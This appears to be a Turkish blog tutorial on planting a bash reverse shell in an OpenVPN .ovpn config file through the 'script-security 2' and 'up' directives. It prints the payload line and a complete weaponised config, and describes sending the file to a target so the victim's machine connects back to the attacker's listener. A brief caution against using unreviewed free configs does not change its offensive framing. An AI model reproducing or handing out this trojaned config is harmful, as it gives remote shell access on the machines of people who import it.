Open VPN İle Reverse Shell Alma

Open VPN İle Reverse Shell Alma

Bu yazımda sizlere Open VPN config dosyasına ekleyeceğiniz iki satır kod ile nasıl Reverse Shell alabileceğinizi anlatacağım. Makaleyi tamamen okuduktan sonra hedef linux makineyi bu yöntemle nasıl ele geçirebileceğinizi ve neden ücretsiz Open VPN configlerinin incelenmeden indirilip kullanılmaması gerektiğini öğreneceksiniz.

Öncelikle bahsetmek istiyorum ki anlatacağım yöntem Linux makineler için geçerlidir, bash reverse tcp payload kullanacağız. Windows makinelerde stabil olmadığı için bu yazımda windows’a yer vermeyeceğim.

Bize gerekenler 1 adet hazır config (.ovpn) dosyası ve shell alabileceğimiz bir sunucu.

.ovpn uzantılı config dosyamızın içerisine ekleyeceğimiz payload:

script-security 2
up "/bin/bash -c 'bash -i >& /dev/tcp/REVERSEIP/REVERSEPORT 0>&1'"

“up” komutu belirttiğiniz herhangi bir komut dosyasını çalıştırır.

REVERSEIP ve REVERSEPORT yazan kısımları reverse shell alacağınız sunucunun ip adresini ve dinleyeceğiniz porta göre düzenleyin.

Şimdi Config dosyasının içini açın ve remote metninin altına payloadınızı yapıştırın.

Config dosyanızın son hali aşağıdaki gibi olmalı.

client
dev tun
proto udp
remote ***.***.**.** 1194
script-security 2
up "/bin/bash -c 'bash -i >& /dev/tcp/***.***.**.**/1337 0>&1'"

Ardından config dosyasını hedefe gönderdiniz ve linux makinesinde çalıştırdı, dananın kuyruğu bu kısımdan sonra kopuyor 😀

Hedef makinede bizim configimiz Open VPN clientine import edilip çalıştırıldığında sunucumuzda dinlediğimiz porta shell gelmiş olacak.

Kurban loglarda her ne kadar payloadı görse de biz çoktan oturum almış olacağız.

Bu yazımda Open VPN ile reverse shell nasıl alırsınız bunu anlatmaya çalıştım, umarım anlaşılır olmuştur. Yazım hakkındaki görüşlerinizi, sorularınızı ve anlatılmasını istediğiniz konu başlıklarını yorumlara yazabilirsiniz.

Sonraki yazımda görüşmek dileğiyle, sağlıcakla kalın…

Yorum Gönder

0Yorumlar
Yorum Gönder (0)